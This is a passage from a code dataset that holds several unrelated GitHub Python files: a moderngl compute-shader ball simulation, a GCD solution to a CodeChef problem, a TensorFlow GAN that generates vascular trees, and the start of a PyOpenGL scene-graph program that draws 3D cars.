values as floats to make it tightly packed.\n// See : https://www.khronos.org/opengl/wiki/Interface_Block_(GLSL)#Memory_layout\nstruct Ball\n{\n vec4 pos; // x, y, 0, radius\n vec4 vel; // x, y (velocity)\n vec4 col; // r, g, b (color)\n};\n\nlayout(std430, binding=0) buffer balls_in\n{\n Ball balls[];\n} In;\nlayout(std430, binding=1) buffer balls_out\n{\n Ball balls[];\n} Out;\n\nvoid main()\n{\n int x = int(gl_GlobalInvocationID);\n\n Ball in_ball = In.balls[x];\n\n vec4 p = in_ball.pos.xyzw;\n vec4 v = in_ball.vel.xyzw;\n\n p.xy += v.xy;\n\n float rad = p.w * 0.5;\n if (p.x - rad <= -1.0)\n {\n p.x = -1.0 + rad;\n v.x *= -0.98;\n }\n else if (p.x + rad >= 1.0)\n {\n p.x = 1.0 - rad;\n v.x *= -0.98;\n }\n\n if (p.y - rad <= -1.0)\n {\n p.y = -1.0 + rad;\n v.y *= -0.98;\n }\n else if (p.y + rad >= 1.0)\n {\n p.y = 1.0 - rad;\n v.y *= -0.98;\n }\n v.y += -0.001;\n\n Ball out_ball;\n out_ball.pos.xyzw = p.xyzw;\n out_ball.vel.xyzw = v.xyzw;\n\n vec4 c = in_ball.col.xyzw;\n out_ball.col.xyzw = c.xyzw;\n\n Out.balls[x] = out_ball;\n}\n\"\"\"\n\nclass ComputeShaderSSBO(Example):\n title = \"Compute Shader SSBO\"\n gl_version = 4, 3 # Required opengl version\n window_size = 600, 600 # Initial window size\n aspect_ratio = 1.0 # Force viewport aspect ratio (regardless of window size)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.COUNT = 256 # number of balls\n self.STRUCT_SIZE = 12 # number of floats per item/ball\n\n # Program for drawing the balls / items\n self.program = self.ctx.program(\n vertex_shader=items_vertex_shader_code,\n geometry_shader=items_geo_shader,\n fragment_shader=items_fragment_shader_code\n )\n\n # Load compute shader\n compute_shader_code_parsed = compute_worker_shader_code.replace(\"%COMPUTE_SIZE%\", str(self.COUNT))\n self.compute_shader = self.ctx.compute_shader(compute_shader_code_parsed)\n\n # Create the two buffers the compute shader will write and read from\n compute_data = np.fromiter(self.gen_initial_data(), dtype=\"f4\")\n self.compute_buffer_a = self.ctx.buffer(compute_data)\n self.compute_buffer_b = self.ctx.buffer(compute_data)\n\n # Prepare vertex arrays to drawing balls using the compute shader buffers are input\n # We use 4x4 (padding format) to skip the velocity data (not needed for drawing the balls)\n self.balls_a = self.ctx.vertex_array(\n self.program, [(self.compute_buffer_a, '4f 4x4 4f', 'in_vert', 'in_col')],\n )\n self.balls_b = self.ctx.vertex_array(\n self.program, [(self.compute_buffer_b, '4f 4x4 4f', 'in_vert', 'in_col')],\n )\n\n def gen_initial_data(self):\n \"\"\"Generator function creating the initial buffer data\"\"\"\n for i in range(self.COUNT):\n _angle = (i / self.COUNT) * math.pi * 2.0\n _dist = 0.125\n radius = random.random() * 0.01 + 0.01\n # position and radius (vec4)\n yield math.cos(_angle) * _dist\n yield math.sin(_angle) * _dist\n yield 0.0\n yield radius\n # velocity (vec4)\n _v = random.random() * 0.005 + 0.01\n yield math.cos(_angle) * _v\n yield math.sin(_angle) * _v\n yield 0.0\n yield 0.0\n # color (vec4)\n yield 1.0 * random.random()\n yield 1.0 * random.random()\n yield 1.0 * random.random()\n yield 1.0\n\n\n def render(self, time, frame_time):\n # Calculate the next position of the balls with compute shader\n self.compute_buffer_a.bind_to_storage_buffer(0)\n self.compute_buffer_b.bind_to_storage_buffer(1)\n self.compute_shader.run(group_x=self.STRUCT_SIZE)\n\n # Batch draw the balls\n self.balls_b.render(mode=self.ctx.POINTS)\n\n # Swap the buffers and vertex arrays around for next frame\n 
self.compute_buffer_a, self.compute_buffer_b = self.compute_buffer_b, self.compute_buffer_a\n        self.balls_a, self.balls_b = self.balls_b, self.balls_a\n\n\nif __name__ == \"__main__\":\n    ComputeShaderSSBO.run()\n","repo_name":"moderngl/moderngl","sub_path":"examples/compute_shader_ssbo.py","file_name":"compute_shader_ssbo.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","stars":1670,"dataset":"github-code","pt":"29"}
{"seq_id":"556787597","text":"\r\n#Code chef Problem https://www.codechef.com/LRNDSA05/problems/ZACKHAN\r\nt=int(input())\r\n\r\n\r\ndef gcd(a, b):\r\n    # if b divides a, then b is the gcd\r\n    if (a%b == 0):\r\n        return b\r\n    return gcd(b, a % b)\r\n\r\nfor x in range(t):\r\n\r\n    m,n=(input().split())\r\n    m=int(m)\r\n    n=int(n)\r\n    g=gcd(m,n)\r\n    print(g)","repo_name":"vinaysr93/Pythonpracticeprograms","sub_path":"zack and handkerchieves.py","file_name":"zack and handkerchieves.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"30791984092","text":"\"\"\"\nCode for generating vascular trees\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom A_6DataEnhance import select_axis\nfrom C_Func import CrashBranchRemove, GrowSeqSort, get_condition, get_coord_seg, Cal_Error, \\\n    angle_determine, Gen_Rotate, CrashDetection, SegExtract\nfrom C_GetEntrance import CoordTrans_R\nfrom scipy import io\n\n\ndef plot_tree(Tree_Data, Coord_Data, Tree_Num, path):\n    x_list = []\n    y_list = []\n\n    for i in range(len(Coord_Data)):\n        Coord_x = Coord_Data[i][0]\n        Coord_y = Coord_Data[i][1]\n        for j in Coord_x:\n            x_list.append(j)\n        for j in Coord_y:\n            y_list.append(j)\n\n    dpi = 600\n    umpp = 1\n    fig = plt.figure(figsize=((max(x_list) - min(x_list)) / dpi, (max(y_list) - min(y_list)) / dpi))\n    ax = fig.add_axes([0, 0, 1, 1])\n\n    for j in range(len(Tree_Data)):\n        # linewidth is in points: 1 point = 1/72 inch, 1 inch = dpi pixels, 1 pixel = umpp um (umpp: um per pixel)\n        # so a vessel segment of diameter D um is drawn with linewidth 72 / (umpp*dpi) * D\n        ax.plot(Coord_Data[j][0], Coord_Data[j][1], 'k-', linewidth=72 / (dpi * umpp) * Tree_Data[j][3])\n\n    ax.axis('off')\n    plt.xlim(min(x_list), max(x_list))\n    plt.ylim(min(y_list), max(y_list))\n\n    plt.savefig('%s/Tree_%s_%d.tiff' % (path, net, Tree_Num), dpi=dpi, pil_kwargs={\"compression\": \"tiff_lzw\"})\n    plt.close()\n\n\ndef deconv(inputs, shape, strides, out_shape, is_sn=False, padding=\"SAME\"):\n    filters = tf.get_variable(\"kernel\", shape=shape, initializer=tf.random_normal_initializer(stddev=0.02))\n    bias = tf.get_variable(\"bias\", shape=[shape[-2]], initializer=tf.constant_initializer([0]))\n    if is_sn:\n        return tf.nn.conv2d_transpose(inputs, spectral_norm(\"sn\", filters), out_shape, strides, padding) + bias\n    else:\n        return tf.nn.conv2d_transpose(inputs, filters, out_shape, strides, padding) + bias\n\n\ndef conv(inputs, shape, strides, is_sn=False, padding=\"SAME\"):\n    filters = tf.get_variable(\"kernel\", shape=shape, initializer=tf.random_normal_initializer(stddev=0.02))\n    bias = tf.get_variable(\"bias\", shape=[shape[-1]], initializer=tf.constant_initializer([0]))\n    if is_sn:\n        return tf.nn.conv2d(inputs, spectral_norm(\"sn\", filters), strides, padding) + bias\n    else:\n        return tf.nn.conv2d(inputs, filters, strides, padding) + bias\n\n\ndef fully_connected(inputs, num_out, is_sn=False):\n    W = tf.get_variable(\"W\", [inputs.shape[-1], num_out], initializer=tf.random_normal_initializer(stddev=0.02))\n    b = 
tf.get_variable(\"b\", [num_out], initializer=tf.constant_initializer([0]))\n if is_sn:\n return tf.matmul(inputs, spectral_norm(\"sn\", W)) + b\n else:\n return tf.matmul(inputs, W) + b\n\n\ndef leaky_relu(inputs, slope=0.2):\n return tf.maximum(slope * inputs, inputs)\n\n\ndef spectral_norm(name, w, iteration=1):\n # Spectral normalization which was published on ICLR2018,please refer to \"https://www.researchgate.net/publication/318572189_Spectral_Normalization_for_Generative_Adversarial_Networks\"\n # This function spectral_norm is forked from \"https://github.com/taki0112/Spectral_Normalization-Tensorflow\"\n w_shape = w.shape.as_list()\n w = tf.reshape(w, [-1, w_shape[-1]])\n with tf.variable_scope(name, reuse=False):\n u = tf.get_variable(\"u\", [1, w_shape[-1]], initializer=tf.truncated_normal_initializer(), trainable=False)\n u_hat = u\n v_hat = None\n\n def l2_norm(v, eps=1e-12):\n return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\n\n for i in range(iteration):\n v_ = tf.matmul(u_hat, tf.transpose(w))\n v_hat = l2_norm(v_)\n u_ = tf.matmul(v_hat, w)\n u_hat = l2_norm(u_)\n sigma = tf.matmul(tf.matmul(v_hat, w), tf.transpose(u_hat))\n w_norm = w / sigma\n with tf.control_dependencies([u.assign(u_hat)]):\n w_norm = tf.reshape(w_norm, w_shape)\n return w_norm\n\n\ndef bn(inputs):\n mean, var = tf.nn.moments(inputs, axes=[1, 2], keep_dims=True)\n scale = tf.get_variable(\"scale\", shape=mean.shape, initializer=tf.constant_initializer([1.0]))\n shift = tf.get_variable(\"shift\", shape=mean.shape, initializer=tf.constant_initializer([0.0]))\n return (inputs - mean) * scale / (tf.sqrt(var + epsilon)) + shift\n\n\ndef conv_cond_concat(x, y):\n \"\"\"Concatenate conditioning vector on feature map axis.\"\"\"\n x_shapes = x.get_shape()\n y_shapes = y.get_shape()\n return tf.concat([x, y * tf.ones([x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]])], 3)\n\n\nclass Generator:\n def __init__(self, name):\n self.name = name\n\n def __call__(self, Z, label, reuse=False):\n with tf.variable_scope(name_or_scope=self.name, reuse=reuse):\n # linear\n Z = tf.concat([Z, label], 1)\n label_ = tf.reshape(label, [batch_size, 1, 1, classfied_num])\n\n with tf.variable_scope(name_or_scope=\"train\"):\n # fully connected layer for generator\n with tf.variable_scope(name_or_scope=\"gfc\"):\n output = fully_connected(Z, 5 * 4 * 1024)\n output = tf.nn.relu(output)\n output = tf.reshape(output, [batch_size, 5, 4, 1024])\n output = conv_cond_concat(output, label_)\n\n # deconv1\n # deconv(inputs, filter_shape, strides, out_shape, is_sn, padding=\"SAME\")\n with tf.variable_scope(name_or_scope=\"deconv1\"):\n output = deconv(output, [3, 3, 512, (1024 + classfied_num)], [1, 1, 1, 1], [batch_size, 5, 4, 512],\n padding=\"SAME\")\n output = bn(output)\n output = tf.nn.relu(output)\n\n # deconv2\n with tf.variable_scope(name_or_scope=\"deconv2\"):\n output = deconv(output, [3, 3, 256, 512], [1, 1, 2, 1], [batch_size, 5, 8, 256], padding=\"SAME\")\n output = bn(output)\n output = tf.nn.relu(output)\n\n # deconv3\n with tf.variable_scope(name_or_scope=\"deconv3\"):\n output = deconv(output, [3, 3, 128, 256], [1, 1, 2, 1], [batch_size, 5, 16, 128], padding=\"SAME\")\n output = bn(output)\n output = tf.nn.relu(output)\n\n # deconv4\n with tf.variable_scope(name_or_scope=\"deconv4\"):\n output = deconv(output, [3, 3, channel, 128], [1, 2, 2, 1], [batch_size, width, height, channel],\n padding=\"SAME\")\n output = tf.nn.tanh(output)\n\n return output\n\n @property\n def var(self):\n return 
tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name + '/train')\n\n\nclass Discriminator:\n    def __init__(self, name):\n        self.name = name\n\n    def __call__(self, inputs, label, reuse=False, is_sn=False):\n        with tf.variable_scope(name_or_scope=self.name, reuse=reuse):\n            label = tf.reshape(label, [batch_size, 1, 1, classfied_num])\n            inputs = conv_cond_concat(inputs, label)\n\n            # conv1\n            # conv(inputs, filter_shape, strides, is_sn, padding=\"SAME\")\n            with tf.variable_scope(\"conv1\"):\n                output = conv(inputs, [3, 3, (1 + classfied_num), 128], [1, 2, 2, 1], is_sn, padding=\"SAME\")\n                output = bn(output) # the generator output layer and the discriminator input layer do not use bn\n                output = leaky_relu(output)\n\n            # conv2\n            with tf.variable_scope(\"conv2\"):\n                output = conv(output, [3, 3, 128, 256], [1, 1, 2, 1], is_sn, padding=\"SAME\")\n                output = bn(output)\n                output = leaky_relu(output)\n\n            # conv3\n            with tf.variable_scope(\"conv3\"):\n                output = conv(output, [3, 3, 256, 512], [1, 1, 2, 1], is_sn, padding=\"SAME\")\n                output = bn(output)\n                output = leaky_relu(output)\n\n            with tf.variable_scope(name_or_scope=\"train\"):\n                # conv4\n                with tf.variable_scope(\"conv4\"):\n                    output = conv(output, [3, 3, 512, 1024], [1, 1, 1, 1], is_sn, padding=\"SAME\")\n                    output = bn(output)\n                    output = leaky_relu(output)\n\n                # fully connected layer for generator\n                with tf.variable_scope(name_or_scope=\"dfc\"):\n                    output = tf.contrib.layers.flatten(output)\n                    output = fully_connected(output, 1, is_sn)\n\n            return output\n\n    @property\n    def var(self):\n        return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name + '/train')\n\n\nclass GAN:\n    # Architecture of generator and discriminator just like DCGAN.\n    def __init__(self):\n        self.Z = tf.placeholder(\"float\", [batch_size, 100])\n        self.img = tf.placeholder(\"float\", [batch_size, width, height, channel])\n        self.label = tf.placeholder(\"float\", [batch_size, classfied_num])\n        D = Discriminator(\"discriminator\")\n        G = Generator(\"generator\")\n        self.fake_img = G(self.Z, self.label)\n\n        # SNGAN, paper: SPECTRAL NORMALIZATION FOR GENERATIVE ADVERSARIAL NETWORKS\n        self.real_logit = D(self.img, self.label, is_sn=True)\n        self.fake_logit = D(self.fake_img, self.label, reuse=True, is_sn=True)\n\n        # D_loss\n        self.real_loss = tf.reduce_mean(\n            tf.nn.sigmoid_cross_entropy_with_logits(logits=self.real_logit, labels=tf.ones_like(self.real_logit)))\n        self.fake_loss = tf.reduce_mean(\n            tf.nn.sigmoid_cross_entropy_with_logits(logits=self.fake_logit, labels=tf.zeros_like(self.fake_logit)))\n        self.d_loss = tf.add(self.fake_loss, self.real_loss)\n\n        # G_loss\n        self.g_loss = tf.reduce_mean(\n            tf.nn.sigmoid_cross_entropy_with_logits(logits=self.fake_logit, labels=tf.ones_like(self.fake_logit)))\n\n        # Optimizer\n        self.opt_D = tf.train.AdamOptimizer(2e-4, beta1=0.5).minimize(self.d_loss, var_list=D.var)\n        self.opt_G = tf.train.AdamOptimizer(2e-4, beta1=0.5).minimize(self.g_loss, var_list=G.var)\n\n        self.sess = tf.Session()\n        self.sess.run(tf.global_variables_initializer())\n        self.saver = tf.train.Saver()\n\n    def generate_branch(self, label_mom):\n\n        concat_gen = []\n        for loop in range(10):\n            z = np.random.uniform(-1, 1, (batch_size, 100)).astype(np.float32)\n            label_batch = np.zeros((batch_size, classfied_num))\n            for i in range(len(label_batch)):\n                label_batch[i][0] = label_mom[0]\n                label_batch[i][1] = label_mom[1]\n            gen = self.sess.run(self.fake_img, feed_dict={self.Z: z, self.label: label_batch})\n            gen = gen.reshape(-1, width, height)\n            gen = (gen + 1) / 2\n\n            for j in range(len(gen)):\n                concat_gen.append(gen[j])\n        gen = 
np.array(concat_gen)  # array of generated daughter bifurcations\n        gen = select_axis(gen)\n        gen = CrashBranchRemove(gen)  # filter out generated bifurcations that collide\n        return gen\n\n    def generate_tree(self, Tree_Num, modelpath, vestype):\n        # define parameters and paths\n        self.saver.restore(self.sess, modelpath)\n\n        threshold = 6  # cutoff diameter (um)\n\n        if not os.path.exists(\"../Data/Generated Trees/TreeImgs_N%s_T%d\" % (net, Tree_Num)):\n            os.makedirs(\"../Data/Generated Trees/TreeImgs_N%s_T%d\" % (net, Tree_Num))\n\n        # get the entrance bifurcation and grow the left and right branches separately\n        if vestype == 'ven':\n            root = np.load(\"../Data/Normalized Data/Entrance_Men_%s_Convergence.npy\" % net)  # venous tree entrance\n        elif vestype == 'art':\n            root = np.load(\"../Data/Normalized Data/Entrance_Men_%s_Bifurcation.npy\" % net)  # arterial tree entrance\n        # angle_distribution = np.load(\"../Data/Normalized Data/Jiajiao.npy\")\n        #\n        Tree_Data = []\n        Coord_Data = []\n        Coord_1, Coord_2, Coord_3, Seg_1, Seg_2, Seg_3 = get_coord_seg(root)  # get coordinates\n\n        # Coord_Data: [[[Coord_x],[Coord_y]]...]\n        Coord_Data.append(Coord_1)\n        Coord_Data.append(Coord_2)\n        Coord_Data.append(Coord_3)\n\n        # Tree_Data: [[ParentNode, DaughterNode1, DaughterNode2, Diam, Length, Tortuosity, Level]...]\n        Tree_Data.append([0, 2, 3] + Seg_1 + [1])\n        Tree_Data.append([1, 0, 0] + Seg_2 + [2])\n        Tree_Data.append([1, 0, 0] + Seg_3 + [2])\n        level = 2\n\n        # the loop terminates when every vessel segment at the maximum level has a diameter <= threshold\n        Diam_List = []\n        for i in range(len(Tree_Data)):\n            if Tree_Data[i][-1] == level and Tree_Data[i][3] > threshold:  # Shen: collect the diameters of the terminal segments\n                Diam_List.append(Tree_Data[i][3])\n\n        while len(Diam_List) > 0:\n            level += 1\n\n            # Seg_Mom_List and Coord_Mom_List are the Tree_Data and Coord_Data entries at the highest level; Index_List holds the segment indices of the bifurcations sorted by diameter in descending order\n            Seg_Mom_List, Coord_Mom_List, Index_List = GrowSeqSort(Tree_Data, Coord_Data)\n\n            for i in range(len(Index_List)):\n                Seg_Mom = Seg_Mom_List[Index_List[i]]\n                Seg_Mom_Index = Tree_Data.index(Seg_Mom)\n                Coord_Mom = Coord_Mom_List[Index_List[i]]\n\n                if Seg_Mom[3] > threshold:\n                    folder = \"../Data/Generated Trees/TreeImgs_N%s_T%d/Epoch%d%d_\" % (net, Tree_Num, level - 1, i)\n                    condition = get_condition(Seg_Mom[3:5])  # get the parent's label\n                    centroid_dir_rev, end_angle = angle_determine(folder, Tree_Data, Coord_Data, Coord_Mom)\n\n                    IsGrow = False\n                    loop_num = 0\n\n                    while not IsGrow and loop_num < 4:\n                        loop_num += 1\n                        Data_Son = gan.generate_branch(condition)\n                        error_th = 0.1\n                        error_mat = Cal_Error(Seg_Mom[3:6], Data_Son,\n                                              error_th)\n\n                        while len(error_mat) == 0 and error_th < 0.5:\n                            error_th += 0.05\n                            error_mat = Cal_Error(Seg_Mom[3:6], Data_Son, error_th)\n\n                        for emi in range(len(error_mat)):\n                            branch = Data_Son[error_mat[emi][1]]\n                            zuo_len, you_len, zuo_angle, you_angle = Gen_Rotate(branch, centroid_dir_rev, end_angle)\n\n                            start_x, start_y = Coord_Mom[0][-1], Coord_Mom[1][-1]\n                            zuo_coord_x, zuo_coord_y = CoordTrans_R(start_x, start_y, np.array(zuo_len) * 200,\n                                                                    zuo_angle)\n                            you_coord_x, you_coord_y = CoordTrans_R(start_x, start_y, np.array(you_len) * 200,\n                                                                    you_angle)\n\n                            flag1 = CrashDetection(Coord_Data, [zuo_coord_x, zuo_coord_y])\n                            flag2 = CrashDetection(Coord_Data, [you_coord_x, you_coord_y])\n\n                            if flag1 & flag2:\n                                Coord_Data.append([zuo_coord_x, zuo_coord_y])\n                                Coord_Data.append([you_coord_x, you_coord_y])\n                                Tree_Data[Seg_Mom_Index][1:3] = [len(Tree_Data) + 1, len(Tree_Data) + 2]\n                                Seg_zuo, Seg_you = SegExtract(branch, Seg_Mom[3])\n                                Tree_Data.append([Seg_Mom_Index + 1, 0, 0] + Seg_zuo + [level])\n                                Tree_Data.append([Seg_Mom_Index + 1, 0, 0] + Seg_you + [level])\n                                IsGrow = True\n                                break\n            print('Finished generating vessel segments at level', level)\n            Diam_List = []\n            for i in range(len(Tree_Data)):\n                if Tree_Data[i][-1] == level and Tree_Data[i][3] > 
threshold:\n                    Diam_List.append(Tree_Data[i][3])\n            break\n        print(\"===== Finished generating vascular tree\", Tree_Num, \"=====\")\n        # self.sess.close()\n        return Tree_Data, Coord_Data\n\n\nif __name__ == \"__main__\":\n\n    os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n    os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2\"\n\n    # parameter settings\n    classfied_num = 2\n    width = 10\n    height = 32\n    channel = 1\n    n_class = 131\n    GAN_type = \"DSNGAN\"\n    epochs = 200\n    epsilon = 1e-14\n    losses = []\n    batch_size=128\n\n    diam_list = [-1, -0.5, 0, 0.5, 1]\n    len_list = [-1, 0, 1]\n\n    tf.reset_default_graph()\n    gan = GAN()\n    vestype = 'ven'\n    # vestype = 'art'\n\n    # select the generator model\n    if vestype == 'ven':\n        modelpath = \"../Model_Checkpoint/PreTrain_Checkpoint/Model_420.ckpt\"  # venous tree model\n        path = \"../Data/ven Trees\"\n    else:\n        modelpath = \"../Model_Checkpoint/ArtTrain_Checkpoint/Model_328.ckpt\"  # arterial tree model\n        path = \"../Data/art Trees\"\n\n    if not os.path.exists('%s' % path):\n        os.makedirs('%s' % path)\n\n    # generate trees\n    net_list = ['389', '546', '913']\n    tree_num = 3  # generate tree_num trees for each entrance\n    for net in net_list:\n        for Tree_Num in range(tree_num):\n            Tree_Data, Coord_Data = gan.generate_tree(Tree_Num, modelpath, vestype)\n\n            np.save('%s/Tree_%s_%s.npy' % (path, net, Tree_Num), Tree_Data)\n            io.savemat('%s/Tree_%s_%s.mat' % (path, net, Tree_Num), {'data': Tree_Data})\n\n            np.save('%s/Tree_%s_%s_Coord.npy' % (path, net, Tree_Num), Coord_Data)\n            io.savemat('%s/Tree_%s_%s_Coord.mat' % (path, net, Tree_Num), {'data': Coord_Data})\n\n            plot_tree(Tree_Data, Coord_Data, Tree_Num, path)\n","repo_name":"pqpqpqpqpq/Generation","sub_path":"Generation/Code/C_LVDO_CCO.py","file_name":"C_LVDO_CCO.py","file_ext":"py","file_size_in_byte":17698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"71227059278","text":"# coding=utf-8\n\"\"\"\nDaniel Calderon, CC3501, 2019-1\nDrawing 3D cars via scene graph\n\"\"\"\n\nimport glfw\nfrom OpenGL.GL import *\nimport OpenGL.GL.shaders\nimport numpy as np\nimport sys\n\nimport transformations2 as tr2\nimport basic_shapes as bs\nimport scene_graph2 as sg\nimport easy_shaders as es\n\n\n# A class to store the application control\n# Add follow_car option\nclass Controller:\n    def __init__(self):\n        self.fillPolygon = True\n        self.showAxis = False\n        self.follow_car = False\n        self.lights = False\n\n\n# we will use the global controller as communication with the callback function\ncontroller = Controller()\n\n\ndef on_key(window, key, scancode, action, mods):\n\n    if action != glfw.PRESS:\n        return\n    \n    global controller\n\n    if key == glfw.KEY_SPACE:\n        controller.fillPolygon = not controller.fillPolygon\n\n    elif key == glfw.KEY_LEFT_CONTROL:\n        controller.showAxis = not controller.showAxis\n\n    elif key == glfw.KEY_ESCAPE:\n        sys.exit()\n\n    elif key == glfw.KEY_C:\n        controller.follow_car = not controller.follow_car\n\n    else:\n        print('Unknown key')\n\n# Create car depending on isNormal value\ndef createCar(r1,g1,b1, r2, g2, b2, isNormal):\n    if isNormal:\n        gpuBlackQuad = es.toGPUShape(bs.createColorNormalsCube(0, 0, 0))\n        gpuChasisQuad_color1 = es.toGPUShape(bs.createColorNormalsCube(r1, g1, b1))\n        gpuChasisQuad_color2 = es.toGPUShape(bs.createColorNormalsCube(r2, g2, b2))\n        gpuChasisPrism = es.toGPUShape(bs.createColorNormalTriangularPrism(153 / 255, 204 / 255, 255 / 255))\n    else:\n        gpuBlackQuad = es.toGPUShape(bs.createColorCube(0,0,0))\n        gpuChasisQuad_color1 = es.toGPUShape(bs.createColorCube(r1,g1,b1))\n        gpuChasisQuad_color2 = es.toGPUShape(bs.createColorCube(r2,g2,b2))\n        gpuChasisPrism = 
es.toGPUShape(bs.createColorTriangularPrism(153/255, 204/255, 255/255))\n \n # Cheating a single wheel\n wheel = sg.SceneGraphNode(\"wheel\")\n wheel.transform = tr2.scale(0.2, 0.8, 0.2)\n wheel.childs += [gpuBlackQuad]\n\n wheelRotation = sg.SceneGraphNode(\"wheelRotation\")\n wheelRotation.childs += [wheel]\n\n # Instanciating 2 wheels, for the front and back parts\n frontWheel = sg.SceneGraphNode(\"frontWheel\")\n frontWheel.transform = tr2.translate(0.3,0,-0.3)\n frontWheel.childs += [wheelRotation]\n\n backWheel = sg.SceneGraphNode(\"backWheel\")\n backWheel.transform = tr2.translate(-0.3,0,-0.3)\n backWheel.childs += [wheelRotation]\n \n # Creating the bottom chasis of the car\n bot_chasis = sg.SceneGraphNode(\"bot_chasis\")\n bot_chasis.transform = tr2.scale(1.1,0.7,0.1)\n bot_chasis.childs += [gpuChasisQuad_color1]\n\n # Moving bottom chasis\n moved_b_chasis = sg.SceneGraphNode(\"moved_b_chasis\")\n moved_b_chasis.transform = tr2.translate(0, 0, -0.2)\n moved_b_chasis.childs += [bot_chasis]\n\n # Creating light support\n light_s = sg.SceneGraphNode(\"light_s\")\n light_s.transform = tr2.scale(1, 0.1, 0.1)\n light_s.childs += [gpuChasisQuad_color2]\n\n # Creating right light\n right_light = sg.SceneGraphNode(\"right_light\")\n right_light.transform = tr2.translate(0, 0.25, 0)\n right_light.childs += [light_s]\n\n # Moving right light\n left_light = sg.SceneGraphNode(\"left_light\")\n left_light.transform = tr2.translate(0, -0.25, 0)\n left_light.childs += [light_s]\n\n # Creating center chasis\n center_chasis = sg.SceneGraphNode(\"center_chasis\")\n center_chasis.transform = tr2.scale(1, 0.4, 0.15)\n center_chasis.childs += [gpuChasisQuad_color1]\n\n # Moving center chasis\n m_center_chasis = sg.SceneGraphNode(\"m_center_chasis\")\n m_center_chasis.transform = tr2.translate(0.05, 0, 0)\n m_center_chasis.childs += [center_chasis]\n\n # Creating center quad\n center_quad = sg.SceneGraphNode(\"center_quad\")\n center_quad.transform = tr2.scale(0.26, 0.5, 0.2)\n center_quad.childs += [gpuChasisQuad_color2]\n\n # Moving center quad\n m_center_quad = sg.SceneGraphNode(\"m_center_quad\")\n m_center_quad.transform = tr2.translate(-0.07, 0, 0.1)\n m_center_quad.childs += [center_quad]\n\n # Creating front wind shield\n f_wind_shield = sg.SceneGraphNode(\"f_wind_shield\")\n f_wind_shield.transform = tr2.scale(0.25, 0.5, 0.2)\n f_wind_shield.childs += [gpuChasisPrism]\n\n # Moving front wind shield\n m_f_wind_shield = sg.SceneGraphNode(\"m_f_wind_shield\")\n m_f_wind_shield.transform = tr2.translate(0.2, 0, 0.1)\n m_f_wind_shield.childs += [f_wind_shield]\n\n # Creating back wind shield\n b_wind_shield = sg.SceneGraphNode(\"b_wind_shield\")\n b_wind_shield.transform = tr2.scale(0.25, 0.5, 0.2)\n b_wind_shield.childs += [gpuChasisPrism]\n\n # Rotate back wind shield\n r_b_wind_shield = sg.SceneGraphNode(\"r_b_wind_shield\")\n r_b_wind_shield.transform = tr2.rotationZ(np.pi)\n r_b_wind_shield.childs += [b_wind_shield]\n\n # Moving back wind shield\n m_b_wind_shield = sg.SceneGraphNode(\"m_b_wind_shield\")\n m_b_wind_shield.transform = tr2.translate(-0.3, 0, 0.1)\n m_b_wind_shield.childs += [r_b_wind_shield]\n\n # Joining chasis parts\n complete_chasis = sg.SceneGraphNode(\"complete_chasis\")\n complete_chasis.childs += [moved_b_chasis]\n complete_chasis.childs += [right_light]\n complete_chasis.childs += [left_light]\n complete_chasis.childs += [m_center_chasis]\n complete_chasis.childs += [m_center_quad]\n complete_chasis.childs += [m_b_wind_shield]\n complete_chasis.childs += 
[m_f_wind_shield]\n\n\n # All pieces together\n car = sg.SceneGraphNode(\"car\")\n car.childs += [complete_chasis]\n car.childs += [frontWheel]\n car.childs += [backWheel]\n\n return car\n\n# Create ground with textures\ndef createGround():\n gpuGround_texture = es.toGPUShape(bs.createTextureQuad(\"ground.jpg\"), GL_REPEAT, GL_NEAREST)\n ground_scaled = sg.SceneGraphNode(\"ground_scaled\")\n ground_scaled.transform = tr2.scale(10, 10, 10)\n ground_scaled.childs += [gpuGround_texture]\n\n ground_rotated = sg.SceneGraphNode(\"ground_rotated_x\")\n ground_rotated.transform = tr2.rotationX(0)\n ground_rotated.childs += [ground_scaled]\n\n ground = sg.SceneGraphNode(\"ground\")\n ground.transform = tr2.translate(0, 0, 0)\n ground.childs += [ground_rotated]\n\n return ground\n\n# Create image of ricardo\ndef createRicardo_1(filename):\n gpuAirport_texture = es.toGPUShape(bs.createTextureQuad(filename), GL_REPEAT, GL_LINEAR)\n ricardo_1_scaled = sg.SceneGraphNode(\"ricardo_scaled\")\n ricardo_1_scaled.transform = tr2.scale(3, 3, 3)\n ricardo_1_scaled.childs += [gpuAirport_texture]\n\n ricardo_1_rotated = sg.SceneGraphNode(\"ricardo_rotated\")\n ricardo_1_rotated.transform = np.matmul(tr2.rotationX(np.pi / 2), tr2.rotationY(np.pi / 2))\n ricardo_1_rotated.childs += [ricardo_1_scaled]\n\n ricardo_1 = sg.SceneGraphNode(\"ricardo\")\n ricardo_1.transform = tr2.translate(6, 0, 1)\n ricardo_1.childs += [ricardo_1_rotated]\n\n return ricardo_1\n\nif __name__ == \"__main__\":\n\n # Initialize glfw\n if not glfw.init():\n sys.exit()\n\n width = 1000\n height = 1000\n\n window = glfw.create_window(width, height, \"Aux 5\", None, None)\n\n if not window:\n glfw.terminate()\n sys.exit()\n\n glfw.make_context_current(window)\n\n # Connecting the callback function 'on_key' to handle keyboard events\n glfw.set_key_callback(window, on_key)\n\n # Assembling the shader program (pipeline) with shaders (simple, texture and lights)\n mvcPipeline = es.SimpleModelViewProjectionShaderProgram()\n textureShaderProgram = es.SimpleTextureModelViewProjectionShaderProgram()\n phongPipeline = es.SimplePhongShaderProgram()\n\n\n\n\n # Setting up the clear screen color\n glClearColor(1, 1, 1, 1.0)\n\n # As we work in 3D, we need to check which part is in front,\n # and which one is at the back\n glEnable(GL_DEPTH_TEST)\n\n # Creating shapes on GPU memory\n gpuAxis = es.toGPUShape(bs.createAxis(7))\n redCarNode = 